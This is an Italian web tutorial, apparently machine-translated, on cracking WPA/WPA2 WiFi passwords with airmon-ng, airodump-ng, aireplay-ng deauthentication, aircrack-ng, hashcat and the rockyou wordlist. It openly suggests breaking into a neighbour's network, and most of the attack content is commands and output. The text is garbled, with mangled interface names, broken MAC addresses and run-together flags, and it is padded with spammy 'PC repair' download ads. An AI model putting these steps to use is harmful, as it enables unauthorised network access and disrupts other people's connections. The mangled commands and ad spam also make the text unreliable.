Come craccare le password WiFi WPAWPA2 tramite Hashcat u0026 amp; Aircrack-ng

Aggiornato 2023 di Marzo: Smetti di ricevere messaggi di errore e rallenta il tuo sistema con il nostro strumento di ottimizzazione. Scaricalo ora a - > questo link

  1. Scaricare e installare lo strumento di riparazione qui.
  2. Lascia che scansioni il tuo computer.
  3. Lo strumento sarà quindi ripara il tuo computer.

In questa guida, ti aiuteremo a scoprire come craccare le reti WiFi utilizzando due dei migliori strumenti di hacking wireless protetti da una password debole. Descriveremo passo dopo passo come hackerare WPA2 usando aircrack-ng e hashcat, sebbene non sia esaustivo. Queste saranno informazioni sufficienti per consentire agli utenti di testare la loro sicurezza di rete o di entrare in una che è vicina.

L'attacco descritto di seguito è del tutto passivo ed è impossibile da rilevare a condizione che la password è stato crackato non verrà utilizzato da te. Per accelerare il processo di ricognizione è possibile utilizzare un attacco di de-autenticazione opzionale e in più puoi saperne di più fino alla fine della guida

Se in qualche modo hai un po 'di know-how riguardo a questo processo, allora non è necessario conoscere le descrizioni, basta passare all'elenco dei comandi che sono stati utilizzati in fondo.

Note importanti:

Ora è possibile prevenire i problemi del PC utilizzando questo strumento, come la protezione contro la perdita di file e il malware. Inoltre, è un ottimo modo per ottimizzare il computer per ottenere le massime prestazioni. Il programma risolve gli errori comuni che potrebbero verificarsi sui sistemi Windows con facilità - non c'è bisogno di ore di risoluzione dei problemi quando si ha la soluzione perfetta a portata di mano:

  • Passo 1: Scarica PC Repair & Optimizer Tool (Windows 11, 10, 8, 7, XP, Vista - Certificato Microsoft Gold).
  • Passaggio 2: Cliccate su "Start Scan" per trovare i problemi del registro di Windows che potrebbero causare problemi al PC.
  • Passaggio 3: Fare clic su "Ripara tutto" per risolvere tutti i problemi.

scaricare

Nota: tieni presente che questo tutorial è solo a scopo didattico e non deve essere utilizzato per alcuna attività illegale e l'autore non è responsabile per alcun tipo di utilizzo.

Gli strumenti necessari

  • Assicurati di essere a tuo agio con la riga di comando di Linux.
  • Assicurati di avere installato Kali Linux o Kali NetHunter.
  • Ora assicurati di aver scaricato e installato Aircrack-ng.
  • L'ultimo strumento di cui hai bisogno è hashcat.
  • John The Ripper è invece un'ottima alternativa se hashcat smette di funzionare per te.

Come decifrare le password WPA2 con Aircrack-ng a nd Hashcat (Tutorial)

Abilita la modalità monitor nell'adattatore WiFi

Devi iniziare elencando le interazioni wireless che supportano la modalità monitor con:

Airmon-ng

Se non è elencata alcuna interfaccia, allora significa che la tua scheda wireless non fornisce supporto alla modalità monitor. Possiamo presumere che il nome dell'interfaccia wireless sia [email protected] assicurati di usare il nome corretto se è diverso da questo, quindi metteremo l'interfaccia in modalità monitor:

Airmon-ng start [email protected]

Dopodiché, è necessario eseguire iwconfig. Ora sarai in grado di vedere una nuova modalità di monitoraggio elencata come m [email protected] o [email protected] .

Trova il tuo target

Devi iniziare ad ascoltare i frame Beacon 802.11 che vengono trasmessi dai router wireless vicini utilizzando l'interfaccia del tuo monitor:

Airodump-ng [email protected]

Vedrai il seguente output:

CH 13] [Trascorso: 52 s] [2021–03–07 16:50

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

14:91:82 : F7: 52: EB-66 205 26 0 1 54e OPN belkin.2e8.guests

14: 91: 82: F7: 52: E8-64 212 56 0 1 54e WPA2 CCMP PSK belkin.2e8

14:22: DB: 1A: DB: 64-81 44 7 0 1 54 WPA2 CCMP \u0026 lt; length: 0 \u0026 gt;

14:22: DB: 1A: DB: 66-83 48 0 0 1 54e. WPA2 CCMP PSK ti sei assicurato

9C: 5C: 8E: C9: AB: C0-81 19 0 0 3 54e WPA2 CCMP PSK ti sei protetto

00: 23: 69: AD: AF: 94-82 350 4 0 1 54e WPA2 CCMP PSK SecuredYou è il migliore

06: 26: BB: 75 : ED: 69-84 232 0 0 1 54e. WPA2 CCMP PSK HH2

78: 71: 9C: 99: 67: D0-82 339 0 0 1 54e. WPA2 CCMP PSK ARRIS-67D2

9C: 34: 26: 9F: 2E: E8-85 40 0 ​​0 1 54e. WPA2 CCMP PSK Comcast_2EEA-EXT

BC: EE: 7B: 8F: 48: 28-85 119 10 0 1 54e WPA2 CCMP PSK root

EC: 1A: 59: 36: AD: CA-86 210 28 0 1 54e WPA2 CCMP PSK belkin.dca

Ora creeremo la password di una rete dal nome secureyou. È necessario ricordare l'indirizzo MAC BSSID e il numero del canale (CH) come viene visualizzato da Airodump-ng poiché sono necessari entrambi per il passaggio successivo.

LEGGERE:   Come scaricare tutte le email di Gmail in blocco (2021)

Come acquisire un Handshake a 4 vie nelle reti WiFi

WPA o WPA2 utilizza un handshake a 4 vie per autenticare i dispositivi sulla rete. Non è necessario sapere cosa significa, ma è necessario acquisire una di queste strette di mano per decifrare la password di rete. Le strette di mano si verificano quando un dispositivo si connette alla rete, come quando i tuoi vicini tornano a casa, possiamo catturare questa stretta di mano indirizzando airmon-ng a monitorare il traffico sulla destinazione utilizzando il canale così come i valori bssid provenienti dall'ultimo comando.

  • sostituisci i valori-c e-bssid con i valori della tua rete di destinazione
  • -w specifica la directory in cui salveremo l'acquisizione del pacchetto
  • airodump-ng-c 3-bssid 9C: 5C: 8E: C9: AB: C0-w. lun0
  • CH 6] [Trascorso: 1 min] [2020–03–7 13:09:16]
  • BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
  • 9C: 5C: 8E: C9: AB: C0-47 0 140 0 0 6 54e WPA2 CCMP PSK DELL

Dopo aver catturato la stretta di mano hai bisogno di vedere qualcosa come {WPA handshake: bc: d3: c9: ef: d2: 67 c'è la parte in alto a destra dello schermo, proprio a destra dell'ora corrente.

Se ti senti impaziente e ti senti a tuo agio con l'utilizzo dell'attacco attivo, è possibile forzare i dispositivi a connettersi alla rete di destinazione per riconnettersi inviando loro pacchetti di de-autenticazione dannosi. Ciò si traduce nella cattura di una stretta di mano a 4 vie.

Una volta che la stretta di mano è stata catturata, è necessario premere ctrl-c per uscire da airodump-ng. Vedrai un file .cap in cui hai detto ad airodump-ng di salvare l'acquisizione che si chiama-01.Cap. Utilizzeremo questo file di acquisizione per decifrare la password di rete. Rinomineremo questo file per riflettere il nome della rete che stiamo cercando di decifrare:

Mv ./-01.cap securedyou .cap

Il vero divertimento: rompere il pin WPA2

L'ultimo passaggio consiste nel decifrare la password utilizzando la stretta di mano catturata. Se hai accesso a una GPU, ti consigliamo vivamente di utilizzare hashcat per il cracking delle password. Abbiamo creato uno strumento che rende hashcat molto facile da usare noto come naïve-hashcat.

Se non hai accesso alla GPU, puoi trovare molti servizi di cracking della GPU che possono essere utilizzati come GPUHASH.me o OnlineHashCrack. Puoi anche usare il cracking della CPU con Aircrack-ng. Tuttavia, se vuoi risparmiare tempo e utilizzare la maggior parte della tua GPU, dovresti overcloccare la tua GPU per accelerare il brute-force.

Tieni presente che entrambi i modi seguenti presuppongono una buona password generata dall'utente . Molti router WPA o WPA2 vengono forniti con una stringa di 12 caratteri di password casuali che la maggior parte degli utenti lascia invariata. Ti consigliamo di utilizzare i probabili elenchi di parole WPA file di dizionario della lunghezza se desideri decifrare una qualsiasi di queste password.

LEGGERE:   Attiva i gesti Xiaomi Poco M3

Usare Naive-Hashcat per fare la magia

Prima di decifrare la password utilizzando naïve-hashcat, è necessario convertire il file .cap nel formato di file hashcat equivalente .hccapx. Questo può essere fatto molto rapidamente caricando il file .cap suhttps://hashcat.net/cap2hccapx o utilizzando direttamente lo strumento cap2hccapx.

Quindi è necessario scaricarlo ed eseguirlo in hashcat:

# downloadgit clonehttps://github.com/brannondorsey/naive-hashcat

cd naive-hashcat

Scarica un elenco di parole o un file dizionario di grandi dimensioni:

Elenco di parole password per crackare le password WiFi WPA2

Modalità hashcat per WPA/WPA2 che devi impostare:

2500 è la modalità hashcat per WPA/WPA2

HASH_FILE = securedyou.hccapx POT_FILE = securedyou.pot HASH_TYPE = 2500 ./naive-hashcat .sh

Il naïve-hashcat utilizza diversi attacchi come regola, combinazione, maschera e dizionario e può impiegare quasi 10 giorni per eseguire contro le password di medio livello. La password violata viene salvata su hackme.pot quindi è necessario controllare periodicamente questo file. Una volta che la password è stata violata, vedrai qualcosa di simile come contenuto del tuo POT_FILE:

e30a5a57fc00211fc9f57a4491508cc3: 9c5c8ec9abc0: acd1b8dfd971: ASUS: securedyouhacking

Gli ultimi due file separati da: sono rispettivamente il nome della rete e la password.

Utilizzo di Aircrack-ng per eseguire Dictionary Attack

Aircrack-ng può essere utilizzato anche per attacchi a dizionario che sono di base e vengono eseguiti sulla CPU. Prima di eseguire l'offesa, è necessario un elenco di parole. Ti consigliamo di utilizzare il famigerato file di dizionario rockyou.

Scarica il file elenco di parole del dizionario RockYou

Tieni presente che se la password di rete non è nell'elenco di parole, non devi decifrare la password.

  • #-a2 specifica WPA2,-b è il BSSID,-w è il file di parole
  • aircrack-ng-a2-b 9C: 5C: 8E: C9: AB: C0-w rockyou.txt hackme.cap

Dovrai visualizza un messaggio KEY FOUND nel terminale seguito da una versione in testo normale della password di rete se la password è violata.

  • Aircrack-ng 2.0
  • <” [00:01:49] 111040 chiavi testate (102,73 k/s)
  • CHIAVE TROVATA! [SecuredYou-test-environment]
  • Chiave principale: A1 90 16 62 6C B3 E2 DB BB D1 79 CB 75 D2 C7 89
  • 59 4A C9 04 67 10 66 C5 97 83 7B C3 DA 6C 29 2E
  • Chiave transitoria: CB 5A F8 CE 62 B2 1B F7 6F 50 C0 25 62 E9 5D 71
  • 2F 1A 26 34 DD 9F 61 F7 68 85 CC BC 0F 88 88 73
  • 6F CB 3F CC 06 0C 06 08 ED DF EC 3C D3 42 5D 78
  • 8D EC 0C EA D2 BC 8A E2 D7 D3 A2 7F 9F 1A D3 21
  • EAPOL HMAC: 9F C6 51 57 D3 FA 99 11 9D 17 12 BA B6 DB 06 B4

Esecuzione del De-Attacco di autenticazione

L'attacco di de-autenticazione può inviare pacchetti di de-autenticazione falsi dalla tua macchina verso il client connesso alla rete che stai tentando di violare. I pacchetti includono indirizzi di mittenti falsi che appaiono al client come se fossero stati inviati dal punto di accesso stesso. Alla ricezione di pacchetti come questi, è probabile che molti client si disconnettano dalla rete e quindi si ricolleghino immediatamente con un handshake a 4 vie se stai ascoltando con airodump-ng.

LEGGERE:   Come falsificare il tuo numero di telefono nel 2021-Fallo sembrare diverso

Puoi usare airodump-ng per monitorare un punto di accesso specifico (utilizzando –c channel –bssid MAC) a meno che e fino a quando non viene visualizzato un client (STATION) connesso. Un client connesso ha quasi questo aspetto, dove è 64: BC: 0C: 48: 97: F7 il client MAC.

  • CH 7] [Trascorso: 4 min] [2020-03-08 20:24]
  • BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
  • 9C: 5C: 8E: C9: AB: C0-19 75 1043 144 10 6 54e WPA2 CCMP PSK ASUS
  • BSSID STATION PWR Rate Lost Frames Prob
  • 9C: 5C: 8E: C9: AB: C0 64: BC: 0C: 48: 97: F7-37 1e-1e 4 6479 Dell

Ora devi lasciare che airodump-ng funzioni e aprire un nuovo terminale. Utilizzeremo un comando airplay-ng per inviare falsi pacchetti di de-autenticazione al client vittima, che lo costringerà a riconnettersi alla rete e, si spera, a prendere una stretta di mano nel processo.

  • -0 3 specifica che vorremmo inviare 3 pacchetti deauth. Aumenta questo numero
  • se necessario, con il rischio di interrompere sensibilmente l'attività di rete del client
  • -a è il MAC del punto di accesso
  • -c è il MAC del client
  • aireplay-ng-0 2-a 9C: 5C: 8E: C9: AB: X0-c 64: DC: 3C: 48: 97: F7 mon0

Puoi anche trasmettere pacchetti deauth a tutti i client connessi in una rete wireless utilizzando il comando seguente:

  • aireplay-ng-0 2-a 9C: 5C: 8E: C9: AB: C0 mon0

Non appena invii i pacchetti deauth , devi tornare al processo airodump-ng e, se hai fortuna, sarai in grado di vedere qualcosa del genere in alto a destra [WPA handshake: 9C: 6C: 9E: D7: 8G: C0. Ora, una volta acquisito l'handshake, sei pronto per decifrare la password di rete.

Versione video del tutorial

Se sei qualcuno che impara guardando qualcun altro mentre lo fa, di seguito troverai una versione video per te.

Hacking di password wireless WPA2 utilizzando Aircrack-ng/Hashcat

Strumenti di hacking wireless alternativi che potresti utilizzare:

  • Download gratuito di Kismet-WiFi Sniffer
  • Download di Reaver WPS Pin Cracker
  • 15 I migliori strumenti di hacking e di sicurezza gratuiti da scaricare.

Ultime parole

Dichiarazione di non responsabilità: questa è solo una simulazione di come qualcuno possa violare le password WPA2 utilizzando strumenti come Hashcat e Aircrack-ng. Questo tipo di attività deve essere eseguita solo in un ambiente controllato in cui viene concessa l'autorizzazione. Tuttavia, spero che questo tutorial completo ti sia piaciuto e che tu ne abbia tratto il massimo vantaggio.

adminguides

Lascia un commento